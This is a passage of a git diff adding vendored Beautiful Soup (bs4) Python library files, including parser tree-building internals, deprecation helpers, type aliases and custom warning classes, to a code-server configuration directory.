string of markup. + :return: Whether or not the markup resembled a filename + closely enough to justify issuing a warning. + """ + markup_b: bytes + + # We're only checking ASCII characters, so rather than write + # the same tests twice, convert Unicode to a bytestring and + # operate on the bytestring. + if isinstance(markup, str): + markup_b = markup.encode("utf8") + else: + markup_b = markup + + # Step 1: does it end with a common textual file extension? + filelike = False + lower = markup_b.lower() + extensions = [b".html", b".htm", b".xml", b".xhtml", b".txt"] + if any(lower.endswith(ext) for ext in extensions): + filelike = True + if not filelike: + return False + + # Step 2: it _might_ be a file, but there are a few things + # we can look for that aren't very common in filenames. + + # Characters that have special meaning to Unix shells. (< was + # excluded before this method was called.) + # + # Many of these are also reserved characters that cannot + # appear in Windows filenames. + for byte in markup_b: + if byte in b"?*#&;>$|": + return False + + # Two consecutive forward slashes (as seen in a URL) or two + # consecutive spaces (as seen in fixed-width data). + # + # (Paths to Windows network shares contain consecutive + # backslashes, so checking that doesn't seem as helpful.) + if b"//" in markup_b: + return False + if b" " in markup_b: + return False + + # A colon in any position other than position 1 (e.g. after a + # Windows drive letter). + if markup_b.startswith(b":"): + return False + colon_i = markup_b.rfind(b":") + if colon_i not in (-1, 1): + return False + + # Step 3: If it survived all of those checks, it's similar + # enough to a file to justify issuing a warning. + warnings.warn( + MarkupResemblesLocatorWarning.FILENAME_MESSAGE % dict(what="filename"), + MarkupResemblesLocatorWarning, + stacklevel=3, + ) + return True + + def _feed(self) -> None: + """Internal method that parses previously set markup, creating a large + number of Tag and NavigableString objects. + """ + # Convert the document to Unicode. + self.builder.reset() + + if self.markup is not None: + self.builder.feed(self.markup) + # Close out any unfinished strings and close all the open tags. + self.endData() + while ( + self.currentTag is not None and self.currentTag.name != self.ROOT_TAG_NAME + ): + self.popTag() + + def reset(self) -> None: + """Reset this object to a state as though it had never parsed any + markup. + """ + Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME) + self.hidden = True + self.builder.reset() + self.current_data = [] + self.currentTag = None + self.tagStack = [] + self.open_tag_counter = Counter() + self.preserve_whitespace_tag_stack = [] + self.string_container_stack = [] + self._most_recent_element = None + self.pushTag(self) + + def new_tag( + self, + name: str, + namespace: Optional[str] = None, + nsprefix: Optional[str] = None, + attrs: Optional[_RawAttributeValues] = None, + sourceline: Optional[int] = None, + sourcepos: Optional[int] = None, + string: Optional[str] = None, + **kwattrs: _RawAttributeValue, + ) -> Tag: + """Create a new Tag associated with this BeautifulSoup object. + + :param name: The name of the new Tag. + :param namespace: The URI of the new Tag's XML namespace, if any. + :param prefix: The prefix for the new Tag's XML namespace, if any. + :param attrs: A dictionary of this Tag's attribute values; can + be used instead of ``kwattrs`` for attributes like 'class' + that are reserved words in Python. + :param sourceline: The line number where this tag was + (purportedly) found in its source document. + :param sourcepos: The character position within ``sourceline`` where this + tag was (purportedly) found. + :param string: String content for the new Tag, if any. + :param kwattrs: Keyword arguments for the new Tag's attribute values. + + """ + attr_container = self.builder.attribute_dict_class(**kwattrs) + if attrs is not None: + attr_container.update(attrs) + tag_class = self.element_classes.get(Tag, Tag) + + # Assume that this is either Tag or a subclass of Tag. If not, + # the user brought type-unsafety upon themselves. + tag_class = cast(Type[Tag], tag_class) + tag = tag_class( + None, + self.builder, + name, + namespace, + nsprefix, + attr_container, + sourceline=sourceline, + sourcepos=sourcepos, + ) + + if string is not None: + tag.string = string + return tag + + def string_container( + self, base_class: Optional[Type[NavigableString]] = None + ) -> Type[NavigableString]: + """Find the class that should be instantiated to hold a given kind of + string. + + This may be a built-in Beautiful Soup class or a custom class passed + in to the BeautifulSoup constructor. + """ + container = base_class or NavigableString + + # The user may want us to use some other class (hopefully a + # custom subclass) instead of the one we'd use normally. + container = cast( + Type[NavigableString], self.element_classes.get(container, container) + ) + + # On top of that, we may be inside a tag that needs a special + # container class. + if self.string_container_stack and container is NavigableString: + container = self.builder.string_containers.get( + self.string_container_stack[-1].name, container + ) + return container + + def new_string( + self, s: str, subclass: Optional[Type[NavigableString]] = None + ) -> NavigableString: + """Create a new `NavigableString` associated with this `BeautifulSoup` + object. + + :param s: The string content of the `NavigableString` + :param subclass: The subclass of `NavigableString`, if any, to + use. If a document is being processed, an appropriate + subclass for the current location in the document will + be determined automatically. + """ + container = self.string_container(subclass) + return container(s) + + def insert_before(self, *args: _InsertableElement) -> List[PageElement]: + """This method is part of the PageElement API, but `BeautifulSoup` doesn't implement + it because there is nothing before or after it in the parse tree. + """ + raise NotImplementedError( + "BeautifulSoup objects don't support insert_before()." + ) + + def insert_after(self, *args: _InsertableElement) -> List[PageElement]: + """This method is part of the PageElement API, but `BeautifulSoup` doesn't implement + it because there is nothing before or after it in the parse tree. + """ + raise NotImplementedError("BeautifulSoup objects don't support insert_after().") + + def popTag(self) -> Optional[Tag]: + """Internal method called by _popToTag when a tag is closed. + + :meta private: + """ + if not self.tagStack: + # Nothing to pop. This shouldn't happen. + return None + tag = self.tagStack.pop() + if tag.name in self.open_tag_counter: + self.open_tag_counter[tag.name] -= 1 + if ( + self.preserve_whitespace_tag_stack + and tag == self.preserve_whitespace_tag_stack[-1] + ): + self.preserve_whitespace_tag_stack.pop() + if self.string_container_stack and tag == self.string_container_stack[-1]: + self.string_container_stack.pop() + # print("Pop", tag.name) + if self.tagStack: + self.currentTag = self.tagStack[-1] + return self.currentTag + + def pushTag(self, tag: Tag) -> None: + """Internal method called by handle_starttag when a tag is opened. + + :meta private: + """ + # print("Push", tag.name) + if self.currentTag is not None: + self.currentTag.contents.append(tag) + self.tagStack.append(tag) + self.currentTag = self.tagStack[-1] + if tag.name != self.ROOT_TAG_NAME: + self.open_tag_counter[tag.name] += 1 + if tag.name in self.builder.preserve_whitespace_tags: + self.preserve_whitespace_tag_stack.append(tag) + if tag.name in self.builder.string_containers: + self.string_container_stack.append(tag) + + def endData(self, containerClass: Optional[Type[NavigableString]] = None) -> None: + """Method called by the TreeBuilder when the end of a data segment + occurs. + + :param containerClass: The class to use when incorporating the + data segment into the parse tree. + + :meta private: + """ + if self.current_data: + current_data = "".join(self.current_data) + # If whitespace is not preserved, and this string contains + # nothing but ASCII spaces, replace it with a single space + # or newline. + if not self.preserve_whitespace_tag_stack: + strippable = True + for i in current_data: + if i not in self.ASCII_SPACES: + strippable = False + break + if strippable: + if "\n" in current_data: + current_data = "\n" + else: + current_data = " " + + # Reset the data collector. + self.current_data = [] + + # Should we add this string to the tree at all? + if ( + self.parse_only + and len(self.tagStack) <= 1 + and (not self.parse_only.allow_string_creation(current_data)) + ): + return + + containerClass = self.string_container(containerClass) + o = containerClass(current_data) + self.object_was_parsed(o) + + def object_was_parsed( + self, + o: PageElement, + parent: Optional[Tag] = None, + most_recent_element: Optional[PageElement] = None, + ) -> None: + """Method called by the TreeBuilder to integrate an object into the + parse tree. + + :meta private: + """ + if parent is None: + parent = self.currentTag + assert parent is not None + previous_element: Optional[PageElement] + if most_recent_element is not None: + previous_element = most_recent_element + else: + previous_element = self._most_recent_element + + next_element = previous_sibling = next_sibling = None + if isinstance(o, Tag): + next_element = o.next_element + next_sibling = o.next_sibling + previous_sibling = o.previous_sibling + if previous_element is None: + previous_element = o.previous_element + + fix = parent.next_element is not None + + o.setup(parent, previous_element, next_element, previous_sibling, next_sibling) + + self._most_recent_element = o + parent.contents.append(o) + + # Check if we are inserting into an already parsed node. + if fix: + self._linkage_fixer(parent) + + def _linkage_fixer(self, el: Tag) -> None: + """Make sure linkage of this fragment is sound.""" + + first = el.contents[0] + child = el.contents[-1] + descendant: PageElement = child + + if child is first and el.parent is not None: + # Parent should be linked to first child + el.next_element = child + # We are no longer linked to whatever this element is + prev_el = child.previous_element + if prev_el is not None and prev_el is not el: + prev_el.next_element = None + # First child should be linked to the parent, and no previous siblings. + child.previous_element = el + child.previous_sibling = None + + # We have no sibling as we've been appended as the last. + child.next_sibling = None + + # This index is a tag, dig deeper for a "last descendant" + if isinstance(child, Tag) and child.contents: + # _last_decendant is typed as returning Optional[PageElement], + # but the value can't be None here, because el is a Tag + # which we know has contents. + descendant = cast(PageElement, child._last_descendant(False)) + + # As the final step, link last descendant. It should be linked + # to the parent's next sibling (if found), else walk up the chain + # and find a parent with a sibling. It should have no next sibling. + descendant.next_element = None + descendant.next_sibling = None + + target: Optional[Tag] = el + while True: + if target is None: + break + elif target.next_sibling is not None: + descendant.next_element = target.next_sibling + target.next_sibling.previous_element = child + break + target = target.parent + + def _popToTag( + self, name: str, nsprefix: Optional[str] = None, inclusivePop: bool = True + ) -> Optional[Tag]: + """Pops the tag stack up to and including the most recent + instance of the given tag. + + If there are no open tags with the given name, nothing will be + popped. + + :param name: Pop up to the most recent tag with this name. + :param nsprefix: The namespace prefix that goes with `name`. + :param inclusivePop: It this is false, pops the tag stack up + to but *not* including the most recent instqance of the + given tag. + + :meta private: + """ + # print("Popping to %s" % name) + if name == self.ROOT_TAG_NAME: + # The BeautifulSoup object itself can never be popped. + return None + + most_recently_popped = None + + stack_size = len(self.tagStack) + for i in range(stack_size - 1, 0, -1): + if not self.open_tag_counter.get(name): + break + t = self.tagStack[i] + if name == t.name and nsprefix == t.prefix: + if inclusivePop: + most_recently_popped = self.popTag() + break + most_recently_popped = self.popTag() + + return most_recently_popped + + def handle_starttag( + self, + name: str, + namespace: Optional[str], + nsprefix: Optional[str], + attrs: _RawAttributeValues, + sourceline: Optional[int] = None, + sourcepos: Optional[int] = None, + namespaces: Optional[Dict[str, str]] = None, + ) -> Optional[Tag]: + """Called by the tree builder when a new tag is encountered. + + :param name: Name of the tag. + :param nsprefix: Namespace prefix for the tag. + :param attrs: A dictionary of attribute values. Note that + attribute values are expected to be simple strings; processing + of multi-valued attributes such as "class" comes later. + :param sourceline: The line number where this tag was found in its + source document. + :param sourcepos: The character position within `sourceline` where this + tag was found. + :param namespaces: A dictionary of all namespace prefix mappings + currently in scope in the document. + + If this method returns None, the tag was rejected by an active + `ElementFilter`. You should proceed as if the tag had not occurred + in the document. For instance, if this was a self-closing tag, + don't call handle_endtag. + + :meta private: + """ + # print("Start tag %s: %s" % (name, attrs)) + self.endData() + + if ( + self.parse_only + and len(self.tagStack) <= 1 + and not self.parse_only.allow_tag_creation(nsprefix, name, attrs) + ): + return None + + tag_class = self.element_classes.get(Tag, Tag) + # Assume that this is either Tag or a subclass of Tag. If not, + # the user brought type-unsafety upon themselves. + tag_class = cast(Type[Tag], tag_class) + tag = tag_class( + self, + self.builder, + name, + namespace, + nsprefix, + attrs, + self.currentTag, + self._most_recent_element, + sourceline=sourceline, + sourcepos=sourcepos, + namespaces=namespaces, + ) + if tag is None: + return tag + if self._most_recent_element is not None: + self._most_recent_element.next_element = tag + self._most_recent_element = tag + self.pushTag(tag) + return tag + + def handle_endtag(self, name: str, nsprefix: Optional[str] = None) -> None: + """Called by the tree builder when an ending tag is encountered. + + :param name: Name of the tag. + :param nsprefix: Namespace prefix for the tag. + + :meta private: + """ + # print("End tag: " + name) + self.endData() + self._popToTag(name, nsprefix) + + def handle_data(self, data: str) -> None: + """Called by the tree builder when a chunk of textual data is + encountered. + + :meta private: + """ + self.current_data.append(data) + + def decode( + self, + indent_level: Optional[int] = None, + eventual_encoding: _Encoding = DEFAULT_OUTPUT_ENCODING, + formatter: Union[Formatter, str] = "minimal", + iterator: Optional[Iterator[PageElement]] = None, + **kwargs: Any, + ) -> str: + """Returns a string representation of the parse tree + as a full HTML or XML document. + + :param indent_level: Each line of the rendering will be + indented this many levels. (The ``formatter`` decides what a + 'level' means, in terms of spaces or other characters + output.) This is used internally in recursive calls while + pretty-printing. + :param eventual_encoding: The encoding of the final document. + If this is None, the document will be a Unicode string. + :param formatter: Either a `Formatter` object, or a string naming one of + the standard formatters. + :param iterator: The iterator to use when navigating over the + parse tree. This is only used by `Tag.decode_contents` and + you probably won't need to use it. + """ + if self.is_xml: + # Print the XML declaration + encoding_part = "" + declared_encoding: Optional[str] = eventual_encoding + if eventual_encoding in PYTHON_SPECIFIC_ENCODINGS: + # This is a special Python encoding; it can't actually + # go into an XML document because it means nothing + # outside of Python. + declared_encoding = None + if declared_encoding is not None: + encoding_part = ' encoding="%s"' % declared_encoding + prefix = '\n' % encoding_part + else: + prefix = "" + + # Prior to 4.13.0, the first argument to this method was a + # bool called pretty_print, which gave the method a different + # signature from its superclass implementation, Tag.decode. + # + # The signatures of the two methods now match, but just in + # case someone is still passing a boolean in as the first + # argument to this method (or a keyword argument with the old + # name), we can handle it and put out a DeprecationWarning. + warning: Optional[str] = None + pretty_print: Optional[bool] = None + if isinstance(indent_level, bool): + if indent_level is True: + indent_level = 0 + elif indent_level is False: + indent_level = None + warning = f"As of 4.13.0, the first argument to BeautifulSoup.decode has been changed from bool to int, to match Tag.decode. Pass in a value of {indent_level} instead." + else: + pretty_print = kwargs.pop("pretty_print", None) + assert not kwargs + if pretty_print is not None: + if pretty_print is True: + indent_level = 0 + elif pretty_print is False: + indent_level = None + warning = f"As of 4.13.0, the pretty_print argument to BeautifulSoup.decode has been removed, to match Tag.decode. Pass in a value of indent_level={indent_level} instead." + + if warning: + warnings.warn(warning, DeprecationWarning, stacklevel=2) + elif indent_level is False or pretty_print is False: + indent_level = None + return prefix + super(BeautifulSoup, self).decode( + indent_level, eventual_encoding, formatter, iterator + ) + + +# Aliases to make it easier to get started quickly, e.g. 'from bs4 import _soup' +_s = BeautifulSoup +_soup = BeautifulSoup + + +class BeautifulStoneSoup(BeautifulSoup): + """Deprecated interface to an XML parser.""" + + def __init__(self, *args: Any, **kwargs: Any): + kwargs["features"] = "xml" + warnings.warn( + "The BeautifulStoneSoup class was deprecated in version 4.0.0. Instead of using " + 'it, pass features="xml" into the BeautifulSoup constructor.', + DeprecationWarning, + stacklevel=2, + ) + super(BeautifulStoneSoup, self).__init__(*args, **kwargs) + + +# If this file is run as a script, act as an HTML pretty-printer. +if __name__ == "__main__": + import sys + + soup = BeautifulSoup(sys.stdin) + print((soup.prettify())) diff --git a/code-server-config/.local/lib/python3.12/site-packages/bs4/_deprecation.py b/code-server-config/.local/lib/python3.12/site-packages/bs4/_deprecation.py new file mode 100755 index 0000000..a7b5685 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/bs4/_deprecation.py @@ -0,0 +1,80 @@ +"""Helper functions for deprecation. + +This interface is itself unstable and may change without warning. Do +not use these functions yourself, even as a joke. The underscores are +there for a reason. No support will be given. + +In particular, most of this will go away without warning once +Beautiful Soup drops support for Python 3.11, since Python 3.12 +defines a `@typing.deprecated() +decorator. `_ +""" + +import functools +import warnings + +from typing import ( + Any, + Callable, +) + + +def _deprecated_alias(old_name: str, new_name: str, version: str): + """Alias one attribute name to another for backward compatibility + + :meta private: + """ + + @property # type:ignore + def alias(self) -> Any: + ":meta private:" + warnings.warn( + f"Access to deprecated property {old_name}. (Replaced by {new_name}) -- Deprecated since version {version}.", + DeprecationWarning, + stacklevel=2, + ) + return getattr(self, new_name) + + @alias.setter + def alias(self, value: str) -> None: + ":meta private:" + warnings.warn( + f"Write to deprecated property {old_name}. (Replaced by {new_name}) -- Deprecated since version {version}.", + DeprecationWarning, + stacklevel=2, + ) + return setattr(self, new_name, value) + + return alias + + +def _deprecated_function_alias( + old_name: str, new_name: str, version: str +) -> Callable[[Any], Any]: + def alias(self, *args: Any, **kwargs: Any) -> Any: + ":meta private:" + warnings.warn( + f"Call to deprecated method {old_name}. (Replaced by {new_name}) -- Deprecated since version {version}.", + DeprecationWarning, + stacklevel=2, + ) + return getattr(self, new_name)(*args, **kwargs) + + return alias + + +def _deprecated(replaced_by: str, version: str) -> Callable: + def deprecate(func: Callable) -> Callable: + @functools.wraps(func) + def with_warning(*args: Any, **kwargs: Any) -> Any: + ":meta private:" + warnings.warn( + f"Call to deprecated method {func.__name__}. (Replaced by {replaced_by}) -- Deprecated since version {version}.", + DeprecationWarning, + stacklevel=2, + ) + return func(*args, **kwargs) + + return with_warning + + return deprecate diff --git a/code-server-config/.local/lib/python3.12/site-packages/bs4/_typing.py b/code-server-config/.local/lib/python3.12/site-packages/bs4/_typing.py new file mode 100755 index 0000000..0ab69df --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/bs4/_typing.py @@ -0,0 +1,205 @@ +# Custom type aliases used throughout Beautiful Soup to improve readability. + +# Notes on improvements to the type system in newer versions of Python +# that can be used once Beautiful Soup drops support for older +# versions: +# +# * ClassVar can be put on class variables now. +# * In 3.10, x|y is an accepted shorthand for Union[x,y]. +# * In 3.10, TypeAlias gains capabilities that can be used to +# improve the tree matching types (I don't remember what, exactly). +# * In 3.9 it's possible to specialize the re.Match type, +# e.g. re.Match[str]. In 3.8 there's a typing.re namespace for this, +# but it's removed in 3.12, so to support the widest possible set of +# versions I'm not using it. + +from typing_extensions import ( + runtime_checkable, + Protocol, + TypeAlias, +) +from typing import ( + Any, + Callable, + Dict, + IO, + Iterable, + Mapping, + Optional, + Pattern, + TYPE_CHECKING, + Union, +) + +if TYPE_CHECKING: + from bs4.element import ( + AttributeValueList, + NamespacedAttribute, + NavigableString, + PageElement, + ResultSet, + Tag, + ) + + +@runtime_checkable +class _RegularExpressionProtocol(Protocol): + """A protocol object which can accept either Python's built-in + `re.Pattern` objects, or the similar ``Regex`` objects defined by the + third-party ``regex`` package. + """ + + def search( + self, string: str, pos: int = ..., endpos: int = ... + ) -> Optional[Any]: ... + + @property + def pattern(self) -> str: ... + + +# Aliases for markup in various stages of processing. +# +#: The rawest form of markup: either a string, bytestring, or an open filehandle. +_IncomingMarkup: TypeAlias = Union[str, bytes, IO[str], IO[bytes]] + +#: Markup that is in memory but has (potentially) yet to be converted +#: to Unicode. +_RawMarkup: TypeAlias = Union[str, bytes] + +# Aliases for character encodings +# + +#: A data encoding. +_Encoding: TypeAlias = str + +#: One or more data encodings. +_Encodings: TypeAlias = Iterable[_Encoding] + +# Aliases for XML namespaces +# + +#: The prefix for an XML namespace. +_NamespacePrefix: TypeAlias = str + +#: The URL of an XML namespace +_NamespaceURL: TypeAlias = str + +#: A mapping of prefixes to namespace URLs. +_NamespaceMapping: TypeAlias = Dict[_NamespacePrefix, _NamespaceURL] + +#: A mapping of namespace URLs to prefixes +_InvertedNamespaceMapping: TypeAlias = Dict[_NamespaceURL, _NamespacePrefix] + +# Aliases for the attribute values associated with HTML/XML tags. +# + +#: The value associated with an HTML or XML attribute. This is the +#: relatively unprocessed value Beautiful Soup expects to come from a +#: `TreeBuilder`. +_RawAttributeValue: TypeAlias = str + +#: A dictionary of names to `_RawAttributeValue` objects. This is how +#: Beautiful Soup expects a `TreeBuilder` to represent a tag's +#: attribute values. +_RawAttributeValues: TypeAlias = ( + "Mapping[Union[str, NamespacedAttribute], _RawAttributeValue]" +) + +#: An attribute value in its final form, as stored in the +# `Tag` class, after it has been processed and (in some cases) +# split into a list of strings. +_AttributeValue: TypeAlias = Union[str, "AttributeValueList"] + +#: A dictionary of names to :py:data:`_AttributeValue` objects. This is what +#: a tag's attributes look like after processing. +_AttributeValues: TypeAlias = Dict[str, _AttributeValue] + +#: The methods that deal with turning :py:data:`_RawAttributeValue` into +#: :py:data:`_AttributeValue` may be called several times, even after the values +#: are already processed (e.g. when cloning a tag), so they need to +#: be able to acommodate both possibilities. +_RawOrProcessedAttributeValues: TypeAlias = Union[_RawAttributeValues, _AttributeValues] + +#: A number of tree manipulation methods can take either a `PageElement` or a +#: normal Python string (which will be converted to a `NavigableString`). +_InsertableElement: TypeAlias = Union["PageElement", str] + +# Aliases to represent the many possibilities for matching bits of a +# parse tree. +# +# This is very complicated because we're applying a formal type system +# to some very DWIM code. The types we end up with will be the types +# of the arguments to the SoupStrainer constructor and (more +# familiarly to Beautiful Soup users) the find* methods. + +#: A function that takes a PageElement and returns a yes-or-no answer. +_PageElementMatchFunction: TypeAlias = Callable[["PageElement"], bool] + +#: A function that takes the raw parsed ingredients of a markup tag +#: and returns a yes-or-no answer. +# Not necessary at the moment. +# _AllowTagCreationFunction:TypeAlias = Callable[[Optional[str], str, Optional[_RawAttributeValues]], bool] + +#: A function that takes the raw parsed ingredients of a markup string node +#: and returns a yes-or-no answer. +# Not necessary at the moment. +# _AllowStringCreationFunction:TypeAlias = Callable[[Optional[str]], bool] + +#: A function that takes a `Tag` and returns a yes-or-no answer. +#: A `TagNameMatchRule` expects this kind of function, if you're +#: going to pass it a function. +_TagMatchFunction: TypeAlias = Callable[["Tag"], bool] + +#: A function that takes a string (or None) and returns a yes-or-no +#: answer. An `AttributeValueMatchRule` expects this kind of function, if +#: you're going to pass it a function. +_NullableStringMatchFunction: TypeAlias = Callable[[Optional[str]], bool] + +#: A function that takes a string and returns a yes-or-no answer. A +# `StringMatchRule` expects this kind of function, if you're going to +# pass it a function. +_StringMatchFunction: TypeAlias = Callable[[str], bool] + +#: Either a tag name, an attribute value or a string can be matched +#: against a string, bytestring, regular expression, or a boolean. +_BaseStrainable: TypeAlias = Union[str, bytes, Pattern[str], bool] + +#: A tag can be matched either with the `_BaseStrainable` options, or +#: using a function that takes the `Tag` as its sole argument. +_BaseStrainableElement: TypeAlias = Union[_BaseStrainable, _TagMatchFunction] + +#: A tag's attribute value can be matched either with the +#: `_BaseStrainable` options, or using a function that takes that +#: value as its sole argument. +_BaseStrainableAttribute: TypeAlias = Union[_BaseStrainable, _NullableStringMatchFunction] + +#: A tag can be matched using either a single criterion or a list of +#: criteria. +_StrainableElement: TypeAlias = Union[ + _BaseStrainableElement, Iterable[_BaseStrainableElement] +] + +#: An attribute value can be matched using either a single criterion +#: or a list of criteria. +_StrainableAttribute: TypeAlias = Union[ + _BaseStrainableAttribute, Iterable[_BaseStrainableAttribute] +] + +#: An string can be matched using the same techniques as +#: an attribute value. +_StrainableString: TypeAlias = _StrainableAttribute + +#: A dictionary may be used to match against multiple attribute vlaues at once. +_StrainableAttributes: TypeAlias = Dict[str, _StrainableAttribute] + +#: Many Beautiful soup methods return a PageElement or an ResultSet of +#: PageElements. A PageElement is either a Tag or a NavigableString. +#: These convenience aliases make it easier for IDE users to see which methods +#: are available on the objects they're dealing with. +_OneElement: TypeAlias = Union["PageElement", "Tag", "NavigableString"] +_AtMostOneElement: TypeAlias = Optional[_OneElement] +_AtMostOneTag: TypeAlias = Optional["Tag"] +_AtMostOneNavigableString: TypeAlias = Optional["NavigableString"] +_QueryResults: TypeAlias = "ResultSet[_OneElement]" +_SomeTags: TypeAlias = "ResultSet[Tag]" +_SomeNavigableStrings: TypeAlias = "ResultSet[NavigableString]" diff --git a/code-server-config/.local/lib/python3.12/site-packages/bs4/_warnings.py b/code-server-config/.local/lib/python3.12/site-packages/bs4/_warnings.py new file mode 100755 index 0000000..4309473 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/bs4/_warnings.py @@ -0,0 +1,98 @@ +"""Define some custom warnings.""" + + +class GuessedAtParserWarning(UserWarning): + """The warning issued when BeautifulSoup has to guess what parser to + use -- probably because no parser was specified in the constructor. + """ + + MESSAGE: str = """No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system ("%(parser)s"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently. + +The code that caused this warning is on line %(line_number)s of the file %(filename)s. To get rid of this warning, pass the additional argument 'features="%(parser)s"' to the BeautifulSoup constructor. +""" + + +class UnusualUsageWarning(UserWarning): + """A superclass for warnings issued when Beautiful Soup sees + something that is typically the result of a mistake in the calling + code, but might be intentional on the part of the user. If it is + in fact intentional, you can filter the individual warning class + to get rid of the warning. If you don't like Beautiful Soup + second-guessing what you are doing, you can filter the + UnusualUsageWarningclass itself and get rid of these entirely. + """ + + +class MarkupResemblesLocatorWarning(UnusualUsageWarning): + """The warning issued when BeautifulSoup is given 'markup' that + actually looks like a resource locator -- a URL or a path to a file + on disk. + """ + + #: :meta private: + GENERIC_MESSAGE: str = """ + +However, if you want to parse some data that happens to look like a %(what)s, then nothing has gone wrong: you are using Beautiful Soup correctly, and this warning is spurious and can be filtered. To make this warning go away, run this code before calling the BeautifulSoup constructor: + + from bs4 import MarkupResemblesLocatorWarning + import warnings + + warnings.filterwarnings("ignore", category=MarkupResemblesLocatorWarning) + """ + + URL_MESSAGE: str = ( + """The input passed in on this line looks more like a URL than HTML or XML. + +If you meant to use Beautiful Soup to parse the web page found at a certain URL, then something has gone wrong. You should use an Python package like 'requests' to fetch the content behind the URL. Once you have the content as a string, you can feed that string into Beautiful Soup.""" + + GENERIC_MESSAGE + ) + + FILENAME_MESSAGE: str = ( + """The input passed in on this line looks more like a filename than HTML or XML. + +If you meant to use Beautiful Soup to parse the contents of a file on disk, then something has gone wrong. You should open the file first, using code like this: + + filehandle = open(your filename) + +You can then feed the open filehandle into Beautiful Soup instead of using the filename.""" + + GENERIC_MESSAGE + ) + + +class AttributeResemblesVariableWarning(UnusualUsageWarning, SyntaxWarning): + """The warning issued when Beautiful Soup suspects a provided + attribute name may actually be the misspelled name of a Beautiful + Soup variable. Generally speaking, this is only used in cases like + "_class" where it's very unlikely the user would be referencing an + XML attribute with that name. + """ + + MESSAGE: str = """%(original)r is an unusual attribute name and is a common misspelling for %(autocorrect)r. + +If you meant %(autocorrect)r, change your code to use it, and this warning will go away. + +If you really did mean to check the %(original)r attribute, this warning is spurious and can be filtered. To make it go away, run this code before creating your BeautifulSoup object: + + from bs4 import AttributeResemblesVariableWarning + import warnings + + warnings.filterwarnings("ignore", category=AttributeResemblesVariableWarning) +""" + + +class XMLParsedAsHTMLWarning(UnusualUsageWarning): + """The warning issued when an HTML parser is used to parse + XML that is not (as far as we can tell) XHTML. + """ + + MESSAGE: str = """It looks like you're using an HTML parser to parse an XML document. + +Assuming this really is an XML document, what you're doing might work, but you should know that using an XML parser will be more reliable. To parse this document as XML, make sure you have the Python package 'lxml' installed, and pass the keyword argument `features="xml"` into the BeautifulSoup constructor. + +If you want or need to use an HTML parser on this document, you can make this warning go away by filtering it. To do that, run this code before calling the BeautifulSoup constructor: + + from bs4 import XMLParsedAsHTMLWarning + import warnings + + warnings.filterwarnings("ignore", category=XMLParsedAsHTMLWarning) +""" diff --git a/code-server-config/.local/lib/python3.12/site-packages/bs4/builder/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/bs4/builder/__init__.py new file mode 100755 index 0000000..4aae4d3 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/bs4/builder/__init__.py @@ -0,0 +1,848 @@ +from __future__ import annotations + +# Use of this source code is governed by the MIT license. +__license__ = "MIT" + +from collections import defaultdict +import re +from types import ModuleType +from typing import ( + Any, + cast, + Dict, + Iterable, + List, + Optional, + Pattern, + Set, + Tuple, + Type, + TYPE_CHECKING, +) +import warnings +import sys +from bs4.element import ( + AttributeDict, + AttributeValueList, + CharsetMetaAttributeValue, + ContentMetaAttributeValue, + RubyParenthesisString, + RubyTextString, + Stylesheet, + Script, + TemplateString, + nonwhitespace_re, +) + +# Exceptions were moved to their own module in 4.13. Import here for +# backwards compatibility. +from bs4.exceptions import ParserRejectedMarkup + +from bs4._typing import ( + _AttributeValues, + _RawAttributeValue, +) + +from bs4._warnings import XMLParsedAsHTMLWarning + +if TYPE_CHECKING: + from bs4 import BeautifulSoup + from bs4.element import ( + NavigableString, + Tag, + ) + from bs4._typing import ( + _AttributeValue, + _Encoding, + _Encodings, + _RawOrProcessedAttributeValues, + _RawMarkup, + ) + +__all__ = [ + "HTMLTreeBuilder", + "SAXTreeBuilder", + "TreeBuilder", + "TreeBuilderRegistry", +] + +# Some useful features for a TreeBuilder to have. +FAST = "fast" +PERMISSIVE = "permissive" +STRICT = "strict" +XML = "xml" +HTML = "html" +HTML_5 = "html5" + +__all__ = [ + "TreeBuilderRegistry", + "TreeBuilder", + "HTMLTreeBuilder", + "DetectsXMLParsedAsHTML", + + "ParserRejectedMarkup", # backwards compatibility only as of 4.13.0 +] + +class TreeBuilderRegistry(object): + """A way of looking up TreeBuilder subclasses by their name or by desired + features. + """ + + builders_for_feature: Dict[str, List[Type[TreeBuilder]]] + builders: List[Type[TreeBuilder]] + + def __init__(self) -> None: + self.builders_for_feature = defaultdict(list) + self.builders = [] + + def register(self, treebuilder_class: type[TreeBuilder]) -> None: + """Register a treebuilder based on its advertised features. + + :param treebuilder_class: A subclass of `TreeBuilder`. its + `TreeBuilder.features` attribute should list its features. + """ + for feature in treebuilder_class.features: + self.builders_for_feature[feature].insert(0, treebuilder_class) + self.builders.insert(0, treebuilder_class) + + def lookup(self, *features: str) -> Optional[Type[TreeBuilder]]: + """Look up a TreeBuilder subclass with the desired features. + + :param features: A list of features to look for. If none are + provided, the most recently registered TreeBuilder subclass + will be used. + :return: A TreeBuilder subclass, or None if there's no + registered subclass with all the requested features. + """ + if len(self.builders) == 0: + # There are no builders at all. + return None + + if len(features) == 0: + # They didn't ask for any features. Give them the most + # recently registered builder. + return self.builders[0] + + # Go down the list of features in order, and eliminate any builders + # that don't match every feature. + feature_list = list(features) + feature_list.reverse() + candidates = None + candidate_set = None + while len(feature_list) > 0: + feature = feature_list.pop() + we_have_the_feature = self.builders_for_feature.get(feature, []) + if len(we_have_the_feature) > 0: + if candidates is None: + candidates = we_have_the_feature + candidate_set = set(candidates) + elif candidate_set is not None: + # Eliminate any candidates that don't have this feature. + candidate_set = candidate_set.intersection(set(we_have_the_feature)) + + # The only valid candidates are the ones in candidate_set. + # Go through the original list of candidates and pick the first one + # that's in candidate_set. + if candidate_set is None or candidates is None: + return None + for candidate in candidates: + if candidate in candidate_set: + return candidate + return None + + +#: The `BeautifulSoup` constructor will take a list of features +#: and use it to look up `TreeBuilder` classes in this registry. +builder_registry: TreeBuilderRegistry = TreeBuilderRegistry() + + +class TreeBuilder(object): + """Turn a textual document into a Beautiful Soup object tree. + + This is an abstract superclass which smooths out the behavior of + different parser libraries into a single, unified interface. + + :param multi_valued_attributes: If this is set to None, the + TreeBuilder will not turn any values for 